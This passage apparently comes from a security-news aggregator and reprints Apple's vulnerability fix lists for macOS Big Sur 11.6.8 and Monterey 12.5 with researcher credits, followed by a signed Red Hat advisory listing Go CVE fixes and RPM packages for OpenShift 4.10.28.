CVE-2022-32786: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Big Sur

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved checks.

CVE-2022-32800: Mickey Jin (@patch1t)

**PluginKit**

Available for: macOS Big Sur

Impact: An app may be able to read arbitrary files

Description: A logic issue was addressed with improved state management.

CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

**PS Normalizer**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32843: Kai Lu of Zscaler's ThreatLabz

**Software Update**

Available for: macOS Big Sur

Impact: A user in a privileged network position can track a user’s activity

Description: This issue was addressed by using HTTPS when sending information over the network.

CVE-2022-32857: Jeffrey Paul (sneak.berlin)

**Spindump**

Available for: macOS Big Sur

Impact: An app may be able to overwrite arbitrary files

Description: This issue was addressed with improved file handling.

CVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

**Spotlight**

Available for: macOS Big Sur

Impact: An app may be able to gain elevated privileges

Description: A validation issue in the handling of symlinks was addressed with improved validation of symlinks.

CVE-2022-26704: Joshua Mason of Mandiant

**TCC**

Available for: macOS Big Sur

Impact: An app may be able to access sensitive user information

Description: An access issue was addressed with improvements to the sandbox.

CVE-2022-32834: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**Vim**

Available for: macOS Big Sur

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating Vim.

CVE-2022-0156

CVE-2022-0158

**Wi-Fi**

Available for: macOS Big Sur

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32847: Wang Yu of Cyberserval

**Windows Server**

Available for: macOS Big Sur

Impact: An app may be able to capture a user’s screen

Description: A logic issue was addressed with improved checks.

CVE-2022-32848: Jeremy Legendre of MacEnhance

CVE-2022-32811: About the security content of macOS Big Sur 11.6.8

Multiple out-of-bounds write issues were addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.5, watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6. An app may be able to disclose kernel memory.

Released July 20, 2022

**APFS**

Available for: macOS Monterey

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32832: Tommy Muir (@Muirey03)

**AppleMobileFileIntegrity**

Available for: macOS Monterey

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

**Apple Neural Engine**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32810: Mohamed Ghannam (@\_simo36)

**Apple Neural Engine**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32840: Mohamed Ghannam (@\_simo36)

**Apple Neural Engine**

Available for: macOS Monterey

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-32845: Mohamed Ghannam (@\_simo36)

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: This issue was addressed with improved checks.

CVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py\_Cat) of Baidu Security, Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-32851: Ye Zhang (@co0py\_Cat) of Baidu Security

CVE-2022-32852: Ye Zhang (@co0py\_Cat) of Baidu Security

CVE-2022-32853: Ye Zhang (@co0py\_Cat) of Baidu Security

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32831: Ye Zhang (@co0py\_Cat) of Baidu Security

**Audio**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32820: an anonymous researcher

**Audio**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32825: John Aakerblom (@jaakerblom)

**Automation**

Available for: macOS Monterey

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved checks.

CVE-2022-32789: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

**Calendar**

Available for: macOS Monterey

Impact: An app may be able to access sensitive user information

Description: The issue was addressed with improved handling of caches.

CVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security

**CoreMedia**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32828: Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom)

**CoreText**

Available for: macOS Monterey

Impact: A remote user may cause an unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2022-32839: STAR Labs (@starlabs\_sg)

**File System Events**

Available for: macOS Monterey

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-32819: Joshua Mason of Mandiant

**GPU Drivers**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: Multiple out-of-bounds write issues were addressed with improved bounds checking.

CVE-2022-32793: an anonymous researcher

**GPU Drivers**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-32821: John Aakerblom (@jaakerblom)

**iCloud Photo Library**

Available for: macOS Monterey

Impact: An app may be able to access sensitive user information

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2022-32849: Joshua Jones

**ICU**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32841: hjy79425575

 **ImageIO**

 Available for: macOS Monterey

 Impact: Processing an image may lead to a denial-of-service

 Description: A null pointer dereference was addressed with improved validation.

 CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2022-32811: ABC Research s.r.o

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.

**Kernel**

Available for: macOS Monterey

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32813: Xinru Chi of Pangu Lab

CVE-2022-32815: Xinru Chi of Pangu Lab

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32817: Xinru Chi of Pangu Lab

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32829: an anonymous researcher

**Liblouis**

Available for: macOS Monterey

Impact: An app may cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China (nipc.org.cn)

**libxml2**

Available for: macOS Monterey

Impact: An app may be able to leak sensitive user information

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-32823

**Multi-Touch**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

**Multi-Touch**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved state handling.

CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

**PackageKit**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: An issue in the handling of environment variables was addressed with improved validation.

CVE-2022-32786: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved checks.

CVE-2022-32800: Mickey Jin (@patch1t)

**PluginKit**

Available for: macOS Monterey

Impact: An app may be able to read arbitrary files

Description: A logic issue was addressed with improved state management.

CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

**PS Normalizer**

Available for: macOS Monterey

Impact: Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32843: Kai Lu of Zscaler's ThreatLabz

**SMB**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-32796: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: An app may be able to gain elevated privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-32842: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: An app may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32798: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: A user in a privileged network position may be able to leak sensitive information

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32799: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: An app may be able to leak sensitive kernel state

Description: The issue was addressed with improved memory handling.

CVE-2022-32818: Sreejith Krishnan R (@skr0x1c0)

**Software Update**

Available for: macOS Monterey

Impact: A user in a privileged network position can track a user’s activity

Description: This issue was addressed by using HTTPS when sending information over the network.

CVE-2022-32857: Jeffrey Paul (sneak.berlin)

**Spindump**

Available for: macOS Monterey

Impact: An app may be able to overwrite arbitrary files

Description: This issue was addressed with improved file handling.

CVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

**Spotlight**

Available for: macOS Monterey

Impact: An app may be able to gain root privileges

Description: This issue was addressed with improved checks.

CVE-2022-32801: Joshua Mason (@josh@jhu.edu)

**subversion**

Available for: macOS Monterey

Impact: Multiple issues in subversion

Description: Multiple issues were addressed by updating subversion.

CVE-2021-28544: Evgeny Kotkov, visualsvn.com

CVE-2022-24070: Evgeny Kotkov, visualsvn.com

CVE-2022-29046: Evgeny Kotkov, visualsvn.com

CVE-2022-29048: Evgeny Kotkov, visualsvn.com

**TCC**

Available for: macOS Monterey

Impact: An app may be able to access sensitive user information

Description: An access issue was addressed with improvements to the sandbox.

CVE-2022-32834: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**WebKit**

Available for: macOS Monterey

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 239316  
CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@\_manfp) working with Trend Micro Zero Day Initiative

**WebRTC**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution.

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 242339  
CVE-2022-2294: Jan Vojtesek of Avast Threat Intelligence team

**Wi-Fi**

Available for: macOS Monterey

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32837: Wang Yu of Cyberserval

**Wi-Fi**

Available for: macOS Monterey

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32847: Wang Yu of Cyberserval

**Windows Server**

Available for: macOS Monterey

Impact: An app may be able to capture a user’s screen

Description: A logic issue was addressed with improved checks.

CVE-2022-32848: Jeremy Legendre of MacEnhance

CVE-2022-32793: About the security content of macOS Monterey 12.5

Red Hat Security Advisory 2022-6094-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.28.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.10.28 packages and security update  
Advisory ID:       RHSA-2022:6094-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6094  
Issue date:        2022-08-23  
CVE Names:         CVE-2022-23773 CVE-2022-23806 CVE-2022-24675  
                   CVE-2022-28327  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.10.28 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.10.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.10 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.10.28. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHBA-2022:6095

Security Fix(es):

* golang: cmd/go: misinterpretation of branch names can lead to incorrect  
access control (CVE-2022-23773)  
* golang: crypto/elliptic: IsOnCurve returns true for invalid field  
elements (CVE-2022-23806)  
* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)  
* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements  
2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar

6. Package List:

Red Hat OpenShift Container Platform 4.10:

Source:  
cri-o-1.23.3-13.rhaos4.10.git6af791c.1.el7.src.rpm  
openshift-ansible-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el7.src.rpm

noarch:  
openshift-ansible-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el7.noarch.rpm  
openshift-ansible-test-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el7.noarch.rpm

x86_64:  
cri-o-1.23.3-13.rhaos4.10.git6af791c.1.el7.x86_64.rpm  
cri-o-debuginfo-1.23.3-13.rhaos4.10.git6af791c.1.el7.x86_64.rpm

Red Hat OpenShift Container Platform 4.10:

Source:  
NetworkManager-1.30.0-16.el8_4.src.rpm  
console-login-helper-messages-0.20.4-1.rhaos4.10.el8.src.rpm  
cri-o-1.23.3-14.rhaos4.10.git6af791c.1.el8.src.rpm  
openshift-ansible-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el8.src.rpm

aarch64:  
NetworkManager-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-adsl-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-adsl-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-bluetooth-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-bluetooth-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-cloud-setup-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-cloud-setup-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-debugsource-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-libnm-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-libnm-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-libnm-devel-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-ovs-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-ovs-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-ppp-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-ppp-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-team-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-team-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-tui-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-tui-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-wifi-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-wifi-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-wwan-1.30.0-16.el8_4.aarch64.rpm  
NetworkManager-wwan-debuginfo-1.30.0-16.el8_4.aarch64.rpm  
cri-o-1.23.3-14.rhaos4.10.git6af791c.1.el8.aarch64.rpm  
cri-o-debuginfo-1.23.3-14.rhaos4.10.git6af791c.1.el8.aarch64.rpm  
cri-o-debugsource-1.23.3-14.rhaos4.10.git6af791c.1.el8.aarch64.rpm

noarch:  
NetworkManager-config-connectivity-redhat-1.30.0-16.el8_4.noarch.rpm  
NetworkManager-config-server-1.30.0-16.el8_4.noarch.rpm  
NetworkManager-dispatcher-routing-rules-1.30.0-16.el8_4.noarch.rpm  
console-login-helper-messages-0.20.4-1.rhaos4.10.el8.noarch.rpm  
console-login-helper-messages-issuegen-0.20.4-1.rhaos4.10.el8.noarch.rpm  
console-login-helper-messages-profile-0.20.4-1.rhaos4.10.el8.noarch.rpm  
openshift-ansible-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.10.0-202208150436.p0.gb1f6fe3.assembly.stream.el8.noarch.rpm

ppc64le:  
NetworkManager-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-adsl-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-adsl-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-bluetooth-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-bluetooth-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-cloud-setup-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-cloud-setup-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-debugsource-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-libnm-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-libnm-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-libnm-devel-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-ovs-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-ovs-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-ppp-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-ppp-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-team-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-team-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-tui-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-tui-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-wifi-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-wifi-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-wwan-1.30.0-16.el8_4.ppc64le.rpm  
NetworkManager-wwan-debuginfo-1.30.0-16.el8_4.ppc64le.rpm  
cri-o-1.23.3-14.rhaos4.10.git6af791c.1.el8.ppc64le.rpm  
cri-o-debuginfo-1.23.3-14.rhaos4.10.git6af791c.1.el8.ppc64le.rpm  
cri-o-debugsource-1.23.3-14.rhaos4.10.git6af791c.1.el8.ppc64le.rpm

s390x:  
NetworkManager-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-adsl-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-adsl-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-bluetooth-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-bluetooth-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-cloud-setup-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-cloud-setup-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-debugsource-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-libnm-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-libnm-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-libnm-devel-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-ovs-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-ovs-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-ppp-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-ppp-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-team-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-team-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-tui-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-tui-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-wifi-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-wifi-debuginfo-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-wwan-1.30.0-16.el8_4.s390x.rpm  
NetworkManager-wwan-debuginfo-1.30.0-16.el8_4.s390x.rpm  
cri-o-1.23.3-14.rhaos4.10.git6af791c.1.el8.s390x.rpm  
cri-o-debuginfo-1.23.3-14.rhaos4.10.git6af791c.1.el8.s390x.rpm  
cri-o-debugsource-1.23.3-14.rhaos4.10.git6af791c.1.el8.s390x.rpm

x86_64:  
NetworkManager-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-adsl-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-adsl-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-bluetooth-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-bluetooth-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-cloud-setup-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-cloud-setup-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-debugsource-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-libnm-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-libnm-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-libnm-devel-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-ovs-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-ovs-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-ppp-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-ppp-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-team-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-team-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-tui-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-tui-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-wifi-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-wifi-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-wwan-1.30.0-16.el8_4.x86_64.rpm  
NetworkManager-wwan-debuginfo-1.30.0-16.el8_4.x86_64.rpm  
cri-o-1.23.3-14.rhaos4.10.git6af791c.1.el8.x86_64.rpm  
cri-o-debuginfo-1.23.3-14.rhaos4.10.git6af791c.1.el8.x86_64.rpm  
cri-o-debugsource-1.23.3-14.rhaos4.10.git6af791c.1.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-23773  
https://access.redhat.com/security/cve/CVE-2022-23806  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwVrz9zjgjWX9erEAQjcbA//eN2vW8asXYihLWgL9HUobwPZIVsGfYFq  
HsYP5wuVWXjrLrxMX0oka8EHcZEgl3g2wewdk2cuAsjt8D8dZszCivUfDe/JZmUD  
z5EZ5kBlUihrGm5xLysRgf11e5j+f0E14zIiy3KEaM7GfghiTZnT53RSh5j7gK3n  
Op5dQCdX6MmSxWmqTa2GvcoXK6eo3L/K4BKxvt0DLCByHQD9sazQg88Gv43eypcX  
SojHLVfLRbrQALy09258f/9n39uMaVIe0A34cTtoWG9w28xYPSEdicf3pJr+oxOq  
E9/x9b+rRYwHl+eDXvfx3zj1teovBTcfslR6W56/JPYUtpN9TuO+XMMkb9q7ujke  
vkJYewklQItsfj6MqbshbhRYAAneo9blk/TAePaez++OQQhhtEN8Ctgdh5/FSg2e  
cAldJQIEdG9O4KlpReNdS8++0MthbXtiumryy3hrv3VzlatQWfL57E0QeHh6iFPj  
uCnqBFuU0qTJA1NeJNfZo05iHmPF7LrlVVwo4ZJjt2e21UhJSyTinJRgYLAl0qsK  
f1PEeFChMafyuBLqRGPvWQb5J8v1GyAGzbalkw/yh2EWbPjvayaduP687tbpvAfJ  
6QQHIkOe53dzQcnnGB/RqSSWnYPuZiwpibquuUeUyx+tNvoZVw/2dxzZ9lpqIRRa  
D7wz6X/+NDE=zFte  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#wifi